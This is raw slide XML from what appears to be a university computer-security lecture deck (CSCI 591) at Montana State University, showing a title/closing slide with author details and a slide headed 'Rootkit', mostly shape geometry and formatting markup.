              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="115" name="矩形 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-19050" y="2219960"/>
            <a:ext cx="12198985" cy="10147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a:ln w="19050">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>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rPr>
              <a:t>THE END</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="6000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln w="19050">
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="black"/>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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9640129" y="6095138"/>
            <a:ext cx="2379149"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2023.09.27</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4768215" y="3272790"/>
            <a:ext cx="2655570" cy="124523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Fangtian</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2500" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">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 </a:t>
            </a:r>
            <a:r>
              <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Zhong</a:t>
            </a:r>
            <a:endPar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CSCI </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"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591</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN"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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="675098" y="1732630"/>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5" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2992261" y="1228497"/>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1" name="Freeform 159"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1969007" y="437235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3"/>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7" name="Freeform 298"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11101499" y="3197526"/>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8" name="Freeform 302"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="11362690" y="125349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25" name="Freeform 157"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10433905" y="201774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2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2886710" y="4955540"/>
            <a:ext cx="6418580"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Gianforte School of Computing </a:t>
            </a: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200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Norm Asbjornson College of Engineering</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="en-GB" sz="2200" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Palatino Linotype" panose="02040502050505030304" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>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E-mail: fangtian.zhong@montana.edu</a:t>
            </a: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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="图片 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311785" y="46355"/>
            <a:ext cx="2063115" cy="1447165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId13"/>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1" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="18" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="2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Rootkit</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1132205" y="1301750"/>
            <a:ext cx="9928225" cy="4780280"/>
            <a:chOff x="998510" y="1183843"/>
            <a:chExt cx="9928225" cy="4780280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 215"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId2"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="998510" y="1333068"/>
              <a:ext cx="9928225" cy="4631055"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1245 w 1301"/>
                <a:gd name="T1" fmla="*/ 536 h 536"/>
                <a:gd name="T2" fmla="*/ 56 w 1301"/>
                <a:gd name="T3" fmla="*/ 536 h 536"/>
                <a:gd name="T4" fmla="*/ 0 w 1301"/>
                <a:gd name="T5" fmla="*/ 480 h 536"/>
                <a:gd name="T6" fmla="*/ 0 w 1301"/>
                <a:gd name="T7" fmla="*/ 56 h 536"/>
                <a:gd name="T8" fmla="*/ 56 w 1301"/>
                <a:gd name="T9" fmla="*/ 0 h 536"/>
                <a:gd name="T10" fmla="*/ 119 w 1301"/>
                <a:gd name="T11" fmla="*/ 0 h 536"/>
                <a:gd name="T12" fmla="*/ 119 w 1301"/>
                <a:gd name="T13" fmla="*/ 8 h 536"/>
                <a:gd name="T14" fmla="*/ 56 w 1301"/>
                <a:gd name="T15" fmla="*/ 8 h 536"/>
                <a:gd name="T16" fmla="*/ 8 w 1301"/>
                <a:gd name="T17" fmla="*/ 56 h 536"/>
                <a:gd name="T18" fmla="*/ 8 w 1301"/>
                <a:gd name="T19" fmla="*/ 480 h 536"/>
                <a:gd name="T20" fmla="*/ 56 w 1301"/>
                <a:gd name="T21" fmla="*/ 528 h 536"/>
                <a:gd name="T22" fmla="*/ 1245 w 1301"/>
                <a:gd name="T23" fmla="*/ 528 h 536"/>
                <a:gd name="T24" fmla="*/ 1293 w 1301"/>
                <a:gd name="T25" fmla="*/ 480 h 536"/>
                <a:gd name="T26" fmla="*/ 1293 w 1301"/>
                <a:gd name="T27" fmla="*/ 56 h 536"/>
                <a:gd name="T28" fmla="*/ 1245 w 1301"/>
                <a:gd name="T29" fmla="*/ 8 h 536"/>
                <a:gd name="T30" fmla="*/ 354 w 1301"/>
                <a:gd name="T31" fmla="*/ 8 h 536"/>
                <a:gd name="T32" fmla="*/ 354 w 1301"/>
                <a:gd name="T33" fmla="*/ 0 h 536"/>
                <a:gd name="T34" fmla="*/ 1245 w 1301"/>
                <a:gd name="T35" fmla="*/ 0 h 536"/>
                <a:gd name="T36" fmla="*/ 1301 w 1301"/>
                <a:gd name="T37" fmla="*/ 56 h 536"/>
                <a:gd name="T38" fmla="*/ 1301 w 1301"/>
                <a:gd name="T39" fmla="*/ 480 h 536"/>
                <a:gd name="T40" fmla="*/ 1245 w 1301"/>
                <a:gd name="T41" fmla="*/ 53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01" h="536">
                  <a:moveTo>
                    <a:pt x="1245" y="536"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="536"/>
                    <a:pt x="56" y="536"/>
                    <a:pt x="56" y="536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="536"/>
                    <a:pt x="0" y="511"/>
                    <a:pt x="0" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="56"/>
                    <a:pt x="0" y="56"/>
                    <a:pt x="0" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="25"/>
                    <a:pt x="25" y="0"/>
                    <a:pt x="56" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="0"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="119" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="8"/>
                    <a:pt x="119" y="8"/>
                    <a:pt x="119" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="8"/>
                    <a:pt x="56" y="8"/>
                    <a:pt x="56" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="8"/>
                    <a:pt x="8" y="30"/>
                    <a:pt x="8" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="480"/>
                    <a:pt x="8" y="480"/>
                    <a:pt x="8" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="506"/>
                    <a:pt x="30" y="528"/>
                    <a:pt x="56" y="528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="528"/>
                    <a:pt x="1245" y="528"/>
                    <a:pt x="1245" y="528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1271" y="528"/>
                    <a:pt x="1293" y="506"/>
                    <a:pt x="1293" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1293" y="56"/>
                    <a:pt x="1293" y="56"/>
                    <a:pt x="1293" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1293" y="30"/>
                    <a:pt x="1271" y="8"/>
                    <a:pt x="1245" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="8"/>
                    <a:pt x="354" y="8"/>
                    <a:pt x="354" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="0"/>
                    <a:pt x="354" y="0"/>
                    <a:pt x="354" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="1245" y="0"/>
                    <a:pt x="1245" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1276" y="0"/>
                    <a:pt x="1301" y="25"/>
                    <a:pt x="1301" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="480"/>
                    <a:pt x="1301" y="480"/>
                    <a:pt x="1301" y="480"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1301" y="511"/>
                    <a:pt x="1276" y="536"/>
                    <a:pt x="1245" y="53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9" name="Rectangle 216"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId3"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1768736" y="1481527"/>
              <a:ext cx="38164" cy="28450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:pr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1" name="Rectangle 218"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId4"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3560379" y="1481527"/>
              <a:ext cx="40940" cy="28450"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:pr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3" name="Freeform 219"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1872127" y="1278214"/>
              <a:ext cx="179719" cy="191517"/>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6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 28"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 14 w 28"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 22 w 28"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 14 w 28"/>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6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="14" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="22" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="10"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="14"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4" name="Freeform 220"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2215606" y="1278214"/>
              <a:ext cx="185271" cy="191517"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 15 w 29"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 0 w 29"/>
                <a:gd name="T3" fmla="*/ 14 h 28"/>
                <a:gd name="T4" fmla="*/ 15 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 29 w 29"/>
                <a:gd name="T7" fmla="*/ 14 h 28"/>
                <a:gd name="T8" fmla="*/ 15 w 29"/>
                <a:gd name="T9" fmla="*/ 28 h 28"/>
                <a:gd name="T10" fmla="*/ 15 w 29"/>
                <a:gd name="T11" fmla="*/ 6 h 28"/>
                <a:gd name="T12" fmla="*/ 7 w 29"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 15 w 29"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 23 w 29"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 15 w 29"/>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28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="28"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="6"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="0"/>
                    <a:pt x="29" y="6"/>
                    <a:pt x="29" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="22"/>
                    <a:pt x="23" y="28"/>
                    <a:pt x="15" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="15" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="7" y="10"/>
                    <a:pt x="7" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="15" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="22"/>
                    <a:pt x="23" y="19"/>
                    <a:pt x="23" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="10"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="15"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5" name="Freeform 221"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2910197" y="1278214"/>
              <a:ext cx="182495" cy="191517"/>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6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 28"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 14 w 28"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 22 w 28"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 14 w 28"/>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6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="14" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="22" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="10"/>
                    <a:pt x="18" y="6"/>
                    <a:pt x="14"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6" name="Freeform 222"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3252982" y="1278214"/>
              <a:ext cx="185271" cy="191517"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 15 w 29"/>
                <a:gd name="T1" fmla="*/ 28 h 28"/>
                <a:gd name="T2" fmla="*/ 0 w 29"/>
                <a:gd name="T3" fmla="*/ 14 h 28"/>
                <a:gd name="T4" fmla="*/ 15 w 29"/>
                <a:gd name="T5" fmla="*/ 0 h 28"/>
                <a:gd name="T6" fmla="*/ 29 w 29"/>
                <a:gd name="T7" fmla="*/ 14 h 28"/>
                <a:gd name="T8" fmla="*/ 15 w 29"/>
                <a:gd name="T9" fmla="*/ 28 h 28"/>
                <a:gd name="T10" fmla="*/ 15 w 29"/>
                <a:gd name="T11" fmla="*/ 6 h 28"/>
                <a:gd name="T12" fmla="*/ 6 w 29"/>
                <a:gd name="T13" fmla="*/ 14 h 28"/>
                <a:gd name="T14" fmla="*/ 15 w 29"/>
                <a:gd name="T15" fmla="*/ 22 h 28"/>
                <a:gd name="T16" fmla="*/ 23 w 29"/>
                <a:gd name="T17" fmla="*/ 14 h 28"/>
                <a:gd name="T18" fmla="*/ 15 w 29"/>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28"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="28"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="6"/>
                    <a:pt x="7" y="0"/>
                    <a:pt x="15" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="0"/>
                    <a:pt x="29" y="6"/>
                    <a:pt x="29" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="22"/>
                    <a:pt x="22" y="28"/>
                    <a:pt x="15" y="28"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="15" y="6"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="6"/>
                    <a:pt x="6" y="10"/>
                    <a:pt x="6" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="10" y="22"/>
                    <a:pt x="15" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="22"/>
                    <a:pt x="23" y="19"/>
                    <a:pt x="23" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="10"/>
                    <a:pt x="19" y="6"/>
                    <a:pt x="15"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7" name="Freeform 223"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId9"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2490389" y="1183843"/>
              <a:ext cx="324050" cy="326134"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 50"/>
                <a:gd name="T1" fmla="*/ 48 h 48"/>
                <a:gd name="T2" fmla="*/ 10 w 50"/>
                <a:gd name="T3" fmla="*/ 47 h 48"/>
                <a:gd name="T4" fmla="*/ 9 w 50"/>
                <a:gd name="T5" fmla="*/ 44 h 48"/>
                <a:gd name="T6" fmla="*/ 11 w 50"/>
                <a:gd name="T7" fmla="*/ 30 h 48"/>
                <a:gd name="T8" fmla="*/ 1 w 50"/>
                <a:gd name="T9" fmla="*/ 21 h 48"/>
                <a:gd name="T10" fmla="*/ 1 w 50"/>
                <a:gd name="T11" fmla="*/ 18 h 48"/>
                <a:gd name="T12" fmla="*/ 3 w 50"/>
                <a:gd name="T13" fmla="*/ 16 h 48"/>
                <a:gd name="T14" fmla="*/ 17 w 50"/>
                <a:gd name="T15" fmla="*/ 14 h 48"/>
                <a:gd name="T16" fmla="*/ 23 w 50"/>
                <a:gd name="T17" fmla="*/ 2 h 48"/>
                <a:gd name="T18" fmla="*/ 28 w 50"/>
                <a:gd name="T19" fmla="*/ 2 h 48"/>
                <a:gd name="T20" fmla="*/ 34 w 50"/>
                <a:gd name="T21" fmla="*/ 14 h 48"/>
                <a:gd name="T22" fmla="*/ 48 w 50"/>
                <a:gd name="T23" fmla="*/ 16 h 48"/>
                <a:gd name="T24" fmla="*/ 50 w 50"/>
                <a:gd name="T25" fmla="*/ 18 h 48"/>
                <a:gd name="T26" fmla="*/ 49 w 50"/>
                <a:gd name="T27" fmla="*/ 21 h 48"/>
                <a:gd name="T28" fmla="*/ 40 w 50"/>
                <a:gd name="T29" fmla="*/ 30 h 48"/>
                <a:gd name="T30" fmla="*/ 42 w 50"/>
                <a:gd name="T31" fmla="*/ 44 h 48"/>
                <a:gd name="T32" fmla="*/ 41 w 50"/>
                <a:gd name="T33" fmla="*/ 47 h 48"/>
                <a:gd name="T34" fmla="*/ 37 w 50"/>
                <a:gd name="T35" fmla="*/ 47 h 48"/>
                <a:gd name="T36" fmla="*/ 25 w 50"/>
                <a:gd name="T37" fmla="*/ 41 h 48"/>
                <a:gd name="T38" fmla="*/ 13 w 50"/>
                <a:gd name="T39" fmla="*/ 47 h 48"/>
                <a:gd name="T40" fmla="*/ 12 w 50"/>
                <a:gd name="T41" fmla="*/ 48 h 48"/>
                <a:gd name="T42" fmla="*/ 25 w 50"/>
                <a:gd name="T43" fmla="*/ 34 h 48"/>
                <a:gd name="T44" fmla="*/ 27 w 50"/>
                <a:gd name="T45" fmla="*/ 35 h 48"/>
                <a:gd name="T46" fmla="*/ 35 w 50"/>
                <a:gd name="T47" fmla="*/ 39 h 48"/>
                <a:gd name="T48" fmla="*/ 33 w 50"/>
                <a:gd name="T49" fmla="*/ 30 h 48"/>
                <a:gd name="T50" fmla="*/ 34 w 50"/>
                <a:gd name="T51" fmla="*/ 27 h 48"/>
                <a:gd name="T52" fmla="*/ 41 w 50"/>
                <a:gd name="T53" fmla="*/ 21 h 48"/>
                <a:gd name="T54" fmla="*/ 32 w 50"/>
                <a:gd name="T55" fmla="*/ 20 h 48"/>
                <a:gd name="T56" fmla="*/ 29 w 50"/>
                <a:gd name="T57" fmla="*/ 18 h 48"/>
                <a:gd name="T58" fmla="*/ 25 w 50"/>
                <a:gd name="T59" fmla="*/ 10 h 48"/>
                <a:gd name="T60" fmla="*/ 21 w 50"/>
                <a:gd name="T61" fmla="*/ 18 h 48"/>
                <a:gd name="T62" fmla="*/ 19 w 50"/>
                <a:gd name="T63" fmla="*/ 20 h 48"/>
                <a:gd name="T64" fmla="*/ 10 w 50"/>
                <a:gd name="T65" fmla="*/ 21 h 48"/>
                <a:gd name="T66" fmla="*/ 17 w 50"/>
                <a:gd name="T67" fmla="*/ 27 h 48"/>
                <a:gd name="T68" fmla="*/ 17 w 50"/>
                <a:gd name="T69" fmla="*/ 30 h 48"/>
                <a:gd name="T70" fmla="*/ 16 w 50"/>
                <a:gd name="T71" fmla="*/ 39 h 48"/>
                <a:gd name="T72" fmla="*/ 24 w 50"/>
                <a:gd name="T73" fmla="*/ 35 h 48"/>
                <a:gd name="T74" fmla="*/ 25 w 50"/>
                <a:gd name="T75"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 h="48">
                  <a:moveTo>
                    <a:pt x="12" y="48"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="48"/>
                    <a:pt x="11" y="47"/>
                    <a:pt x="10" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="46"/>
                    <a:pt x="9" y="45"/>
                    <a:pt x="9" y="44"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="30"/>
                    <a:pt x="11" y="30"/>
                    <a:pt x="11" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="21"/>
                    <a:pt x="1" y="21"/>
                    <a:pt x="1" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20"/>
                    <a:pt x="0" y="19"/>
                    <a:pt x="1" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="17"/>
                    <a:pt x="2" y="16"/>
                    <a:pt x="3" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="14"/>
                    <a:pt x="17" y="14"/>
                    <a:pt x="17" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                    <a:pt x="23" y="2"/>
                  </a:cubicBezTo>
